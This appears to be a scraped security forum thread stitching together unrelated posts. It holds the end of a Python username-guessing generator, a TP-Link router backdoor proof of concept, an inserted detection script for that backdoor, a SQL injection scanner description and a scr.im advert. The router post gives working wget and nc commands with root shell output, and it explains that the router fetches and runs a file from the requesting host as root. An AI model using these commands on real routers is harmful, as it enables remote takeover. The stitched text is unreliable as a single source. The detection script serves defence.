    resultList.sort()

# Lowercase Filter
#
# Transforms entries to lowercase
def filter_lowercase(resultList):
    for key, result in enumerate(resultList):
        resultList[key] = result.lower()

####
# Parsing Plugins
####

# Normal Plugin
#
# Generates usernames based on concatenation
# of first name with surnames in permutation
#
# Ex: JohnPaulJones, JohnJonesPaul
def plugin_normal(firstName, surnames, resultList):
    surnamePermutations = permutate_all(surnames)

    for permutations in surnamePermutations:
        resultList.append(firstName + ''.join(permutations))
        resultList.append(''.join(permutations) + firstName)

# Two Terms Plugin
#
# Generates usernames based on concatenation
# of first name with surnames in permutation
#
# Ex: JohnPaul, JohnJones, PaulJones
def plugin_two_terms(firstName, surnames, resultList):
    # Try each surname with
    # first name and reversed
    for surname in surnames:
        resultList.append(firstName + surname)
        resultList.append(surname + firstName)

    # If more than one surname,
    # combine'em too
    if len(surnames) > 1:
        tokens = list(surnames)
        for surname in surnames:
            firstToken = tokens.pop(0)
            for token in tokens:
                resultList.append(firstToken + token)

# One Term Plugin
#
# Generates usernames based on permutation
# of first name and surnames generating one-word
# usernames
#
# Ex: John, Paul, Jones
def plugin_one_term(firstName, surnames, resultList):
    tokens = [ firstName ]
    tokens += surnames

    for name in tokens:
        resultList.append(name)

# Dotted Two Terms Plugin
#
# Generates usernames based on concatenation
# of first name with surnames in permutation
# with a dot in the middle
#
# Ex: John.Paul, John.Jones, Paul.Jones
def plugin_dotted_two_terms(firstName, surnames, resultList):
    # Try each surname with
    # first name and reversed
    for surname in surnames:
        resultList.append(firstName + '.' + surname)
        resultList.append(surname + '.' + firstName)

# Normal Abbreviated Plugin
#
# Generates usernames based on concatenation
# of first name with surnames in permutation
# in abbreviated forms
#
# Ex: JohnPJones, JohnPaulJ, JohnJonesP JohnJPaul
def plugin_normal_abbreviated(firstName, surnames, resultList):
    permutatedSurnames = permutate_all(surnames)
    firstNameArr = [ firstName ]

    # All Terms
    for entry in permutatedSurnames:
        nameFirst = list(firstNameArr + entry)
        nameLast = list(entry + firstNameArr)

        for name in abbreviate(nameFirst):
            resultList.append(name)
        for name in abbreviate(nameLast):
            resultList.append(name)

    # Two Words
    for surname in surnames:
        for name in abbreviate([ firstName, surname ]):
            resultList.append(name)
        for name in abbreviate([ surname, firstName ]):
            resultList.append(name)

####
# Util functions
####

def permutate_all(tokens):
    if len(tokens) <= 1:
        yield tokens
    else:
        for perm in permutate_all(tokens[1:]):
            for i in range(len(perm) + 1):
                yield perm[:i] + tokens[0:1] + perm[i:]

def abbreviate(tokens):
    resultList = []
    tokenCount = len(tokens)

    # One abbreviated word
    for i in range(tokenCount):
        output = ''
        position = 0
        for j in tokens:
            if i == position:
                output += j[0]
            else:
                output += j
            position += 1
        resultList.append(output)

    # Two abbreviated words
    for i in range(tokenCount):
        output = ''
        position = 0
        for j in tokens:
            if i == position or i == position + 1:
                output += j[0]
            else:
                output += j
            position += 1
        resultList.append(output)

    # All-but-one abbreviated words
    if tokenCount > 3:
        for i in range(tokenCount):
            output = ''
            position = 0
            for j in tokens:
                if i == position:
                    output += j
                else:
                    output += j[0]
                position += 1
            resultList.append(output)

    return resultList

####
# Main
####

def main():
    try:
        # Long options that take a value need the trailing '='
        opts, args = getopt.getopt(sys.argv[1:], "hlp:f:n:",
                                   ["help", "lowercase", "plugins=", "file=", "name="])

        inputFile = None
        inputName = None
        defaultPlugins = AVAILABLE_PLUGINS
        defaultFilters = AVAILABLE_FILTERS

        for o, a in opts:
            if o in ("-h", "--help"):
                usage()
                sys.exit()
            elif o in ("-f", "--file"):
                inputFile = a
            elif o in ("-p", "--plugins"):
                pluginList = str(a).split(',')
                validPlugins = []
                for plugin in pluginList:
                    try:
                        pluginIndex = AVAILABLE_PLUGINS.index(plugin)  # check plugin existence
                        validPlugins.append(plugin)
                    except ValueError:
                        error('Invalid plugin: "' + plugin + '"')
                defaultPlugins = validPlugins
            elif o in ("-n", "--name"):
                inputName = a
            elif o in ("-l", "--lowercase"):
                defaultFilters.append('lowercase')
            else:
                error("option '" + o + "' doesn't exist")

        if inputFile == None and inputName == None:
            error('Please specify an input file or name')

        if inputFile != None and inputName != None:
            error('Please specify only an input file or name, not both')

        # If name was supplied,
        # process single entry and exit
        if inputName:
            parse_name(inputName, plugins = defaultPlugins, filters = defaultFilters)
            sys.exit(0)

        # If file was supplied,
        # process each line
        if inputFile:
            parse_file(inputFile, plugins = defaultPlugins, filters = defaultFilters)
            sys.exit(0)

    except getopt.GetoptError as err:
        # print help information and exit:
        sys.stderr.write(str(err))
        usage()
        sys.exit(2)

def usage():
    print("")
    print("usage: " + sys.argv[0] + " [ -f <file> ] [ -n <full name> ] [ -l ]")
    print("")
    print("flags:")
    print("\t-n\tsupplies a single name")
    print("\t-f\tsupplies name entries from text file")
    print("\t-l\tconverts result to lowercase")
    print("\t-p\tmanually specify plugins (comma-separated) [default: all]")
    print("\t\t" + str(AVAILABLE_PLUGINS))
    print("")

def error(errorMsg, fatal=True, showUsage=True):
    sys.stderr.write(errorMsg + "\n")
    if showUsage:
        usage()
    if fatal:
        sys.exit(2)

if __name__ == "__main__":
    main()

Download

Download the latest version of usernamer directly from the github project page.

Source
  22. Fi8sVrs

    Logs

    they are old. Details on BAU : Luci : Thu 10/27/2011
  23. About the TP-Link Router

TP-Link TL-WDR4300 is a popular dual band WiFi, SOHO class router.

Tested Firmware

We tested the remote root PoC on the newest firmware (published on 25.12.2012):

TL-WDR4300 – tested firmware version

The following info is provided for educational use only! We are also not responsible for any potential damages of the devices which are tested for this vulnerability.

Proof of Concept

root@secu:~# nc 192.168.0.1 2222
(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused
root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
--2013-03-09 23:22:31-- http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
Connecting to 192.168.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: "start_art.html"

[ <=> ] 426 --.-K/s in 0s

2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]

root@secu:~# nc 192.168.0.1 2222
ps
PID Uid VmSize Stat Command
1 root 404 S init
2 root SW< [kthreadd]
3 root SW< [ksoftirqd/0]
4 root SW< [events/0]
5 root SW< [khelper]
6 root SW< [async/mgr]
7 root SW< [kblockd/0]
8 root SW [pdflush]
9 root SW [pdflush]
10 root SW< [kswapd0]
17 root SW< [mtdblockd]
18 root SW< [unlzma/0]
71 root 2768 S /usr/bin/httpd
76 root 380 S /sbin/getty ttyS0 115200
78 root 208 S ipcserver
82 root 2768 S /usr/bin/httpd
83 root 2768 S /usr/bin/httpd
86 root 732 S ushare -d -x -f /tmp/ushare.conf
92 root 348 S syslogd -C -l 7
96 root 292 S klogd
101 root SW< [napt_ct_scan]
246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
286 root 2768 S /usr/bin/httpd
299 root 2768 S /usr/bin/httpd
300 root 2768 S /usr/bin/httpd
305 root 2768 S /usr/bin/httpd
307 root 2768 S /usr/bin/httpd
309 root 2768 S /usr/bin/httpd
310 root 2768 S /usr/bin/httpd
389 root 2768 S /usr/bin/httpd

Details

After the following HTTP request is sent:

http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html

the router downloads a file (nart.out) from the host which has issued the http request and executes it as root:

PoC – diagram

Sample captures from the host which issues the http request:

Wireshark filter used to show router tftp traffic

nart.out tftp request

Models affected

TL-WDR4300
TL-WR743ND (v1.2 v2.0)
…

History of the bug

12.02.2013 – TP-Link e-mailed with details – no response
22.02.2013 – TP-Link again e-mailed with details – no response
12.03.2013 – public disclosure

More information

More information about TP-Link backdoor

Source TP-Link http/tftp backdoor
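Detection logic for the two-step behaviour the post describes, as an added example that is not part of the original post or the advisory: it flags HTTP requests for the debug page and correlates them with a TFTP read of nart.out issued by the router back to the requesting host. The one-line event format and the sample events are constructed assumptions, not real captures.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not real captures): a LAN client requests the
# debug page on the router, and two seconds later the router sends a TFTP
# read request for "nart.out" back to that same client, as described above.
SAMPLE_EVENTS = [
    "2013-03-09 23:22:31 http  src=192.168.0.100 dst=192.168.0.1 GET /userRpmNatDebugRpm26525557/start_art.html",
    "2013-03-09 23:22:32 http  src=192.168.0.100 dst=192.168.0.1 GET /index.html",
    "2013-03-09 23:22:33 tftp  src=192.168.0.1 dst=192.168.0.100 RRQ nart.out",
    "2013-03-09 23:40:10 tftp  src=192.168.0.1 dst=192.168.0.50 RRQ firmware.bin",
]

# The debug path seen in the post; the numeric part is matched generically.
DEBUG_PATH_RE = re.compile(r"/userRpmNatDebugRpm\d+/start_art\.html")
# Assumed event line layout: "<date> <time> <proto> src=<ip> dst=<ip> <rest>"
EVENT_RE = re.compile(
    r"(?P<ts>\S+ \S+) (?P<proto>http|tftp)\s+src=(?P<src>\S+) dst=(?P<dst>\S+) (?P<rest>.*)"
)

def parse_event(line):
    """Parse one event line into a dict, or return None for lines that do not fit."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S")
    return ev

def find_backdoor_activity(lines, window=timedelta(seconds=60)):
    """Return (alert_kind, client, router) tuples: one for every request to the
    debug page, and one for every TFTP fetch of nart.out, marked as correlated
    when the router fetches it from a host that hit the debug page within `window`."""
    alerts = []
    pending = {}  # (router, client) -> time of the triggering HTTP request
    for ev in filter(None, map(parse_event, lines)):
        if ev["proto"] == "http" and DEBUG_PATH_RE.search(ev["rest"]):
            pending[(ev["dst"], ev["src"])] = ev["ts"]
            alerts.append(("debug-url-request", ev["src"], ev["dst"]))
        elif ev["proto"] == "tftp" and ev["rest"].endswith("nart.out"):
            key = (ev["src"], ev["dst"])  # router -> client direction
            t0 = pending.get(key)
            if t0 is not None and ev["ts"] - t0 <= window:
                alerts.append(("nart.out-fetch-after-debug-url", ev["dst"], ev["src"]))
            else:
                alerts.append(("nart.out-fetch", ev["dst"], ev["src"]))
    return alerts
```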
  24. Description

SQLSentinel is an open source tool that automates the process of finding SQL injection on a website. SQLSentinel includes a web spider and an SQL error finder. You give it a site as input and SQLSentinel crawls it and tries to exploit parameter validation errors for you. When the job is finished, it can generate a PDF report which contains the vulnerable URLs found and the URLs crawled.

Features

Support for MySQL, PostgreSQL, Microsoft SQL Server and Oracle (BETA)
SQL injection techniques: union, error based and blind query (and XML Error Based for Oracle also)
Automatic random user-agents for the spider and SQL crawler connections
Cookie module for crawling and checking sites that require login
HTTP Proxy Support
Built-in crawler bot

Download

SQLSentinel - OpenSource tool for sql injection security testing
  25. Convert your email address into a short, cute and safe link you can share on the web, in Twitter, forums, Craigslist, anywhere

Use scr.im to get less spam

Leaving your email as plain text in forums, on Twitter or on classified sites makes you an easy spam target: spam robots and email harvesters constantly browse these sites to collect new victim emails.

Don't share your email on public sites. Instead, use our free service that will convert your email address (joe@email.com) into a safe and short URL (for instance http://scr.im/joe). People willing to email you will go to this URL that will reveal your email address, after a simple test that automated scripts and bots cannot pass.

Don't share your email. Don't make yourself an easy spam target. Instead, share your safe scr.im URL

scr.im - email protect